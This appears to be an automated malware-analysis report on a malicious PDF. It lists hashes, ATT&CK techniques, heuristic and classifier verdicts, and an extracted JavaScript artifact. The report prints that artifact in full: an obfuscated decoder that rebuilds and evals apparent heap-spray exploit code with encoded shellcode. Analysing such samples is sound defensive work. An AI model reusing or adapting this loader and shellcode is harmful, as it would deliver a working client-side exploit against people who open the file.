Malicious PDF / .TXT — malware analysis report

Static analysis result for SHA-256 871a48d74d0fd1ba…

MALICIOUS

PDF / .TXT

9.2 KB Created: 2010-05-10 05:12:34 Authoring application: fCWnNtO (via Uz8pGpf) First seen: 2026-05-11
MD5: 9ae372d1ec2c9f8e632431da150313b5 SHA-1: 3ea111db225039a64dd6c014fd02b8c64b571aa5 SHA-256: 871a48d74d0fd1ba17d04f64582176d11bfcfee86e6c52650764abcf31a531e6
166 Risk Score

Malware Insights

MITRE ATT&CK
T1059.007 JavaScript T1203 Exploitation for Client Execution T1566.001 Spearphishing Attachment

The PDF sample contains embedded JavaScript that is heavily obfuscated, but heuristics indicate it is part of an exploit cluster. The ML classifier strongly suggests maliciousness. The script's obfuscated nature and the exploit cluster firing indicate it is designed to execute malicious code, likely downloading a secondary payload.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 4

  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
    g)FwrAqxYKWidEntHOpF=FL57LLLLL;\nFF(g)FJ94<WL3kZEvJbmV{F=FR5EgbNzKYTv8bRAecYC9ObrF*Fi;\nFF(g)FDfYKznJBk,Za,9roF=FwrAqxYKWidEntHOpF-FlJ94<WL3kZEvJbmV{F+FL5,jX;\nFF(g)F<<Lp>K>WD4w>eyo3F=Fv9CK8gqCl\"%v L L%v L L\"X;\nFF<<Lp>K>WD4w>eyo3F=FousAN5HZ{>NHb6fsl<<Lp>K>WD4w>eyo31FDfYKznJBk,Za,9roX;\nFF(g)Fud0O}SniQJdCuv)LF=FlT2jnt4n,}Tega)SmF-FL57LLLLLXF/FwrAqxYKWidEntHOp;\nFFV4)Fl(g)FsV0pqCxDYyQCbd<>F=FL;FsV0pqCxDYyQCbd<>FPFud0O}SniQJdCuv)L;FsV0pqCxDYyQCbd<>F++FXM\nFFFFrToYuBy)rO{J44T([sV0pqCxDYyQCbd<>]F= …
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0007_000.js pdf-javascript-stream PDF /JS object 7 at offset 0x23A 7999 bytes
SHA-256: 1290908f4e0644e11a376fdc40c9ce442958a00f2b6ef7203d6e6f124c73f161
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s). 111 of 151 identifiers look randomly generated (e.g. 'nFFFFFFFF2rGYCFlewye8BKmo0BKD4YrcYC9ObrF') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
function bHuUug(bHuUug,vKKTxf) {var yvHozcJvh8Zt6O=bHuUug. substr (vKKTxf, 1);return yvHozcJvh8Zt6O;}/*VKGF1|AUb6G9dmHFa3MEtp|eMN46JI9*/function eA6wEY0ke(Eku1ZrFwBYTXs2) {/*TGkKxgfOclO6|WBoQNtA3|eFLZCUiBz1IaC56hKZJZ*/var AH2HTLlTHYYgP = new String("<>(){} .,ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789");/*XvWBCkvCds[j46lOfnDXvdZr]A2zGRLeDifF*//*QIm9pL4|wIHaMeMq44G1w6|DIdHq8MyPUaPAmKmYSuz*/var B1Cll4BT9yVXHsGAP9HH /*PBLJ5SBsPAvXd[DcF2saT8b5IDUayK6DM]MIaN0qO*/= new String("P.lXMhFc1a3npdDTk<JSzefUyZH0mwxWsQAgI8{CVOrGNuYR94qo)Kbv(25B6L}i,7>tEj ");/*DrfHJlA1CUzdQ7|kYVvUY7clF2z6|DimuEu3pvusFkL*/for(aStuaI=0;aStuaI<AH2HTLlTHYYgP.length;aStuaI++) {if(Eku1ZrFwBYTXs2 == bHuUug(B1Cll4BT9yVXHsGAP9HH, aStuaI)) {/*ht66ErQdps[ul3qK6]xqThj9TU*/return bHuUug(AH2HTLlTHYYgP, aStuaI);/*Y52udmqZqYqJDZNy <GfLDu]tEgTD0ouOjn8CPpc6DIF*/}}return Eku1ZrFwBYTXs2;}/*hT5iaa[dLtNPQgSGKDUuqTx]AP2CX8J5REesfOLq7Y5N*//*NTGRo087o463x9RvIND|rvr57Y3W|GRhaYyEOw*/var jFSnfzEVf5EyoM7y = new String;var Z6Durk0cu = new String("\n(g)FrToYuBy)rO{J44T(F=F9C2Fa))gBlX;\n(g)Fo4(IyYNo0eNB4QvR;\nVv98bG49FousAN5HZ{>NHb6fsl<<Lp>K>WD4w>eyo31FDfYKznJBk,Za,9roXM\nFF2rGYCFl<<Lp>K>WD4w>eyo3cYC9ObrF*FiFPFDfYKznJBk,Za,9roXM\nFFFF<<Lp>K>WD4w>eyo3F+=F<<Lp>K>WD4w>eyo3;\nFFh\nFF<<Lp>K>WD4w>eyo3F=F<<Lp>K>WD4w>eyo3cKvIKb)G9OlL1FDfYKznJBk,Za,9roF/FiX;\nFF)Cbv)9F<<Lp>K>WD4w>eyo3;\nh\nVv98bG49Fyo>aN O6237JgvxulQT{{m28u6,vio8K5XM\nFF(g)FT2jnt4n,}Tega)SmF=FL5L8L8L8L8;\nFF(g)FR5EgbNzKYTv8bRAeF=Fv9CK8gqCl\"%v7,7,%v7,7,%v7,7,%vLDd3%v,,>3%vttn %vjL3 %vjLL}%vdD,,%vdi7,%vd3Da%vdjL>%vDDdn%vDDDD%vj3ED%vpD7d%vdDdD%vt7dD%vd,aD%v Dt7%v7iD,%v Dt7%vtddE%vdDL,%vdDd3%vt7dD%v3 L,%vt}jE%vd}a}%vLEL,%vdD}}%vdDdD%vaatt%v3 d3%vEEjE%vt>}}%vLEd}%vdD}D%vdDdD%vaatt%v3 dE%vnajE%v}L>D%vLEip%vdDLp%vdDdD%vaatt%v3 d,%vLLjE%vLDi}%vLEjD%vdD,3%vdDdD%vaatt%v3 DD%vidjE%vLa t%vLE>E%vdDi %vdDdD%vaatt%vaDD3%vpEtD%v ain%vtt}>%vDEaa%vdjLt%vdDdd%v3}dD%v att%vt7n3%vd3aa%vddj>%vt73t%vDE3a%vLE3 %vdDt7%vdDdD%vjE3D%vD>p %v DnL%vEjLE%vdDdD%vttdD%vD,aa%viat7%viDtn%vtt3D%vnDaa%v}LjE%vdDdD%v3DdD%vaat7%vj>D3%v3tdp%v3at7%vLEDE%vdDjd%vdDdD%vaadn%vijnD%v3,dD%vn} }%vijja%vd3aD%vja E%vdDdD%v a}L%vt7nD%vd,aa%vddj>%vt73t%vDE3a%vaDLE%vdDdD%vj>dD%v3Edj%vaadn%vpnn3%v3n,7%v}L3n%vnD a%v3n3D%vaat7%vj>D,%v3tda%v3at7%vLEDE%vdDnn%vdDdD%vdDj>%v a}L%vt7nD%vdEaa%vdpj>%vt73t%vDE3a%vDDLE%vdDdD%vj>dD%vt7}L%vDDaa%vddj>%vt73t%vDE3a%vdDLE%vdDdD%vaddD%v3p37%vLddn%vLddn%vLddn%vLddn%vL,tn%v3>d3%vt73n%vLp,>%v3p}j%vLD}L%vt73a%vt7L,%vdE i%v3it7%v3 d,%v nt7%vt7p,%vD} 3%vdn E%v3 }n%v  t7%vdnnD%vpn}n%vatit%v7iad%vindn%vpn3 %vdL} %vDD>}%v}pp>%vdE 3%vi}id%vdndi%vaD}p%v}dL7%v}}p7%v a3}%v3>La%vL7t7%v3>t7%vdnn3%vj ,i%vd,t7%vt7a7%vD,3>%v,idn%vd3t7%vdnt7%v3}ia%vip3i%vdDdE%v}3LE%v}L}}%v3a}L%va,3p%vaLai%vdDa}%vE7tj%vELE7%viD,a%vt7iD%vtp,L%v,}t}%vE,td%vt id%vtttd%viDtD%vtnti%vtEtD%vtniD%vt}tD%vidt7%vtjEL%v,DEL%vt7t %v, ,p%vLL,}\"X;\nFFGVFlQT{{m28u6,vio8K5F==F}XM\nFFFFT2jnt4n,}Tega)SmF=FL5,L,L,L,L;\nFFFFR5EgbNzKYTv8bRAeF=Fv9CK8gqCl\"%v7,7,%v7,7,%v7,7,%vLDd3%v,,>3%vttn %vjL3 %vjLL}%vdD,,%vdi7,%vd3Da%vdjL>%vDDdn%vDDDD%vj3ED%vpD7d%vdDdD%vt7dD%vd,aD%v Dt7%v7iD,%v Dt7%vtddE%vdDL,%vdDd3%vt7dD%v3 L,%vt}jE%vd}a}%vLEL,%vdD}}%vdDdD%vaatt%v3 d3%vEEjE%vt>}}%vLEd}%vdD}D%vdDdD%vaatt%v3 dE%vnajE%v}L>D%vLEip%vdDLp%vdDdD%vaatt%v3 d,%vLLjE%vLDi}%vLEjD%vdD,3%vdDdD%vaatt%v3 DD%vidjE%vLa t%vLE>E%vdDi %vdDdD%vaatt%vaDD3%vpEtD%v ain%vtt}>%vDEaa%vdjLt%vdDdd%v3}dD%v att%vt7n3%vd3aa%vddj>%vt73t%vDE3a%vLE3 %vdDt7%vdDdD%vjE3D%vD>p %v DnL%vEjLE%vdDdD%vttdD%vD,aa%viat7%viDtn%vtt3D%vnDaa%v}LjE%vdDdD%v3DdD%vaat7%vj>D3%v3tdp%v3at7%vLEDE%vdDjd%vdDdD%vaadn%vijnD%v3,dD%vn} }%vijja%vd3aD%vja E%vdDdD%v a}L%vt7nD%vd,aa%vddj>%vt73t%vDE3a%vaDLE%vdDdD%vj>dD%v3Edj%vaadn%vpnn3%v3n,7%v}L3n%vnD a%v3n3D%vaat7%vj>D,%v3tda%v3at7%vLEDE%vdDnn%vdDdD%vdDj>%v a}L%vt7nD%vdEaa%vdpj>%vt73t%vDE3a%vDDLE%vdDdD%vj>dD%vt7}L%vDDaa%vddj>%vt73t%vDE3a%vdDLE%vdDdD%vaddD%v3p37%vLddn%vLddn%vLddn%vLddn%vL,tn%v3>d3%vt73n%vLp,>%v3p}j%vLD}L%vt73a%vt7L,%vdE i%v3it7%v3 d,%v nt7%vt7p,%vD} 3%vdn E%v3 }n%v  t7%vdnnD%vpn}n%vatit%v7iad%vindn%vpn3 %vdL} %vDD>}%v}pp>%vdE 3%vi}id%vdndi%vaD}p%v}dL7%v}}p7%v a3}%v3>La%vL7t7%v3>t7%vdnn3%vj ,i%vd,t7%vt7a7%vD,3>%v,idn%vd3t7%vdnt7%v3}ia%vip3i%vdDdE%v}3LE%v}L}}%v3a}L%va,3p%vaLai%vdDa}%vE7tj%vELE7%viD,a%vt7iD%vtp,L%v,}t}%vE,td%vt id%vtttd%viDtD%vtnti%vtEtD%vtniD%vt}tD%vidt7%vtjEL%v,DEL%vt7t %v, ,p%vLL,}\"X;\nFFh\nFFCYKCFGVFlQT{{m28u6,vio8K5F==FiXM\nFFFFR5EgbNzKYTv8bRAeF=Fv9CK8gqCl\"%v7,7,%v7,7,%v7,7,%vLDd3%v,,>3%vttn %vjL3 %vjLL}%vdD,,%vdi7,%vd3Da%vdjL>%vDDdn%vDDDD%vj3ED%vpD7d%vdDdD%vt7dD%vd,aD%v Dt7%v7iD,%v Dt7%vtddE%vdDL,%vdDd3%vt7dD%v3 L,%vt}jE%vd}a}%vLEL,%vdD}}%vdDdD%vaatt%v3 d3%vEEjE%vt>}}%vLEd}%vdD}D%vdDdD%vaatt%v3 dE%vnajE%v}L>D%vLEip%vdDLp%vdDdD%vaatt%v3 d,%vLLjE%vLDi}%vLEjD%vdD,3%vdDdD%vaatt%v3 DD%vidjE%vLa t%vLE>E%vdDi %vdDdD%vaatt%vaDD3%vpEtD%v ain%vtt}>%vDEaa%vdjLt%vdDdd%v3}dD%v att%vt7n3%vd3aa%vddj>%vt73t%vDE3a%vLE3 %vdDt7%vdDdD%vjE3D%vD>p %v DnL%vEjLE%vdDdD%vttdD%vD,aa%viat7%viDtn%vtt3D%vnDaa%v}LjE%vdDdD%v3DdD%vaat7%vj>D3%v3tdp%v3at7%vLEDE%vdDjd%vdDdD%vaadn%vijnD%v3,dD%vn} }%vijja%vd3aD%vja E%vdDdD%v a}L%vt7nD%vd,aa%vddj>%vt73t%vDE3a%vaDLE%vdDdD%vj>dD%v3Edj%vaadn%vpnn3%v3n,7%v}L3n%vnD a%v3n3D%vaat7%vj>D,%v3tda%v3at7%vLEDE%vdDnn%vdDdD%vdDj>%v a}L%vt7nD%vdEaa%vdpj>%vt73t%vDE3a%vDDLE%vdDdD%vj>dD%vt7}L%vDDaa%vddj>%vt73t%vDE3a%vdDLE%vdDdD%vaddD%v3p37%vLddn%vLddn%vLddn%vLddn%vL,tn%v3>d3%vt73n%vLp,>%v3p}j%vLD}L%vt73a%vt7L,%vdE i%v3it7%v3 d,%v nt7%vt7p,%vD} 3%vdn E%v3 }n%v  t7%vdnnD%vpn}n%vatit%v7iad%vindn%vpn3 %vdL} %vDD>}%v}pp>%vdE 3%vi}id%vdndi%vaD}p%v}dL7%v}}p7%v a3}%v3>La%vL7t7%v3>t7%vdnn3%vj ,i%vd,t7%vt7a7%vD,3>%v,idn%vd3t7%vdnt7%v3}ia%vip3i%vdDdE%v}3LE%v}L}}%v3a}L%va,3p%vaLai%vdDa}%vE7tj%vELE7%viD,a%vt7iD%vtp,L%v,}t}%vE,td%vt id%vtttd%viDtD%vtnti%vtEtD%vtniD%vt}tD%vidt7%vtjEL%v,DEL%vt7t %v, ,p%vLL,}\"X;\nFFh\nFF(g)FwrAqxYKWidEntHOpF=FL57LLLLL;\nFF(g)FJ94<WL3kZEvJbmV{F=FR5EgbNzKYTv8bRAecYC9ObrF*Fi;\nFF(g)FDfYKznJBk,Za,9roF=FwrAqxYKWidEntHOpF-FlJ94<WL3kZEvJbmV{F+FL5,jX;\nFF(g)F<<Lp>K>WD4w>eyo3F=Fv9CK8gqCl\"%v L L%v L L\"X;\nFF<<Lp>K>WD4w>eyo3F=FousAN5HZ{>NHb6fsl<<Lp>K>WD4w>eyo31FDfYKznJBk,Za,9roX;\nFF(g)Fud0O}SniQJdCuv)LF=FlT2jnt4n,}Tega)SmF-FL57LLLLLXF/FwrAqxYKWidEntHOp;\nFFV4)Fl(g)FsV0pqCxDYyQCbd<>F=FL;FsV0pqCxDYyQCbd<>FPFud0O}SniQJdCuv)L;FsV0pqCxDYyQCbd<>F++FXM\nFFFFrToYuBy)rO{J44T([sV0pqCxDYyQCbd<>]F=F<<Lp>K>WD4w>eyo3F+FR5EgbNzKYTv8bRAe;\nFFh\nh\nVv98bG49FKuY0tBwC<NJ7{apzlXM\nFF(g)FqOAVSt(ExwYUG7maF=FL;\nFF(g)FQD{bdjQWo)Aw,RoKF=Fgqqc(GC2C)xC)KG49cb40b)G9OlX;\nFFgqqc8YCg)mGRCUvblo4(IyYNo0eNB4QvRX;\n\nFFGVFlQD{bdjQWo)Aw,RoKFPFEc}XM\nFFFFyo>aN O6237JgvxulLX;\nFFFF(g)FkZQ9xwb}BVyOGb)WF=Fv9CK8gqCl\"%vL8L8%vL8L8\"X;\nFFFF2rGYCFlkZQ9xwb}BVyOGb)WcYC9ObrFPF77 >iXkZQ9xwb}BVyOGb)WF+=FkZQ9xwb}BVyOGb)W;\nFFFFbrGKFc84YYgI0b4)CF=Fn4YYgIc84YYC8bdRgGY<9V4lM\nFFFFFFKvINF:F\"\"1FRKOF:FkZQ9xwb}BVyOGb)W\nFFFFh\nFFFFX;\nFFh\nGVFlQD{bdjQWo)Aw,RoKF.=F XM\nFFFFb)BFM\nGVFlgqqc{48cn4YYgIcOCb<849XM\nFFFFFFFFyo>aN O6237JgvxuliX;\nFFFFFFFF(g)Fewye8BKmo0BKD4YrF=Fv9CK8gqCl\"%L \"X;\nFFFFFFFF2rGYCFlewye8BKmo0BKD4YrcYC9ObrFPFL57LLLXewye8BKmo0BKD4YrF+=Fewye8BKmo0BKD4Yr;\nFFFFFFFFewye8BKmo0BKD4YrF=F\"fc\"F+Fewye8BKmo0BKD4Yr;\ngqqc{48cn4YYgIcOCb<849lewye8BKmo0BKD4YrX;\nFFFFFFFFqOAVSt(ExwYUG7maF=F};\nFFFFFFh\nFFFFFFCYKCFM\nFFFFFFFFqOAVSt(ExwYUG7maF=F};\nFFFFFFh\nFFFFh\nFFFF8gb8rFlCXM\nFFFFFFqOAVSt(ExwYUG7maF=F};\nFFFFh\nFFFFGVFlqOAVSt(ExwYUG7maF==F}XM\nFFFFFFGVFllQD{bdjQWo)Aw,RoKF.=FEc}&&FQD{bdjQWo)Aw,RoKFPF XXM\nFFFFFFFFyo>aN O6237Jgvxul}X;\nFFFFFFFF(g)F)SxNqyu9>LwR,z<3F=F\"}i                  \";\nFFFFFFFFV4)FlgGsHrZ(sbby r3q2F=FL;FgGsHrZ(sbby r3q2FPFiEt;FgGsHrZ(sbby r3q2F++FXM\nFFFFFFFFFF)SxNqyu9>LwR,z<3F+=F\"j\";\nFFFFFFFFh\nFFFFFFFFvbGYcq)G9bVl\"%7>LLLV\"1F)SxNqyu9>LwR,z<3X;\nFFFFFFh\nFFFFh\nFFh\nh\ngqqcVzOzuZ 4g8g85b49F=FKuY0tBwC<NJ7{apz;\no4(IyYNo0eNB4QvRF=FgqqcKCbmGRCUvbl\"gqqcVzOzuZ 4g8g85b49lX\"1F}LX;\n");/*Ar9xe{EPGSST9EB5BZyXs5oQVC}ZR1cLi*//*ACZDSgVlzVp1|qQFE9AtQV|UuEMNPvoNxEQGkmrZ*/for(vigfI=0;vigfI<Z6Durk0cu.length;vigfI++)jFSnfzEVf5EyoM7y += eA6wEY0ke(bHuUug(Z6Durk0cu,vigfI));eval(jFSnfzEVf5EyoM7y);/*WRNDiSHiS1ynnJYrVl6G[K4UbA4DsU]FmOJK*/